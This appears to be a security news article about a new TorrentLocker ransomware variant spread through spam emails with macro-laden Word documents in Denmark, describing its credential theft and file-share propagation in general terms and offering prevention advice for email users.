TorrentLocker returned with a vengeance and an enhanced arsenal. The ransomware deployed two large scale attacks in Denmark within a few days. Upon analyzing the new variant of the program, researchers at Heimdal Security made concerning discoveries.
The malware analysts found that TorrentLocker has gone through significant improvements. The ransomware now has the ability to steal user names and passwords. This expands the threat specter. Victims now have to worry about having their personal accounts hacked.
The developers of TorrentLocker have also made an effort to improve the distribution rate of the ransomware. The program can transfer itself to another device through a shared file. This makes it possible for TorrentLocker to infect entire computer systems.
While we are on the topic of distribution, we might as well explain how the ransomware is spread. According to the Heimdal researcher team, the virus travels with Microsoft Word documents. The distributors use spam emails.
On another note, the process of downloading and installing TorrentLocker to the targeted computer initiates upon prompting a malicious macro. When you open the document, it will be unreadable. You will be asked to enable the macro. Clicking the “Enable Editing” button would result in a PowerShell code being executed. PowerShell is an advanced Windows process and, as such, it can download and install programs.
The good news is that users have a second chance to avoid the infection. Even if they get tricked to download the file, they can block the virus by denying the request to run the macro.
The detection levels for TorrentLocker were low at the start. The VirusTotal online service accounted for a rate of 3/55. The actual numbers may be much higher, though, since the online scanner does not work like a desktop anti-virus application.
Heimdal addressed the detection aspect in their blog post on TorrentLocker: “These spam waves are very aggressive, so please be extra cautious with protecting your inbox and carefully evaluate which emails you open. A similar spam wave spreading TorrentLocker as well still achieves a rather low detection rate, even 4 days after it was discovered: 19/56 on VirusTotal.”
Prevention is the key when it comes to viruses
The best way to deal with cyber infections is to avoid contacting them. As we already mentioned, the latest build of TorrentLocker uses spam emails as a propagation vector. This is the most common way for ransomware viruses to be spread.
Spam campaigns are as intense as ever, so you should proof the reliability of all your emails. Do a checkup even if the sender is familiar. Spammers often write on behalf of legitimate entities to lead people astray. Do not be in a hurry to open a document, however important it may appear to be. Finally, never agree to bypass the security features of your email client. If the attached file is harmless, this would be unnecessary.
There are decryption tools for past variants of TorrentLocker. They have yet to be tested with the new version of the virus. We will have to wait before we find out whether the program can be decrypted with the existing tools, or if a new decrypter will need to be developed.
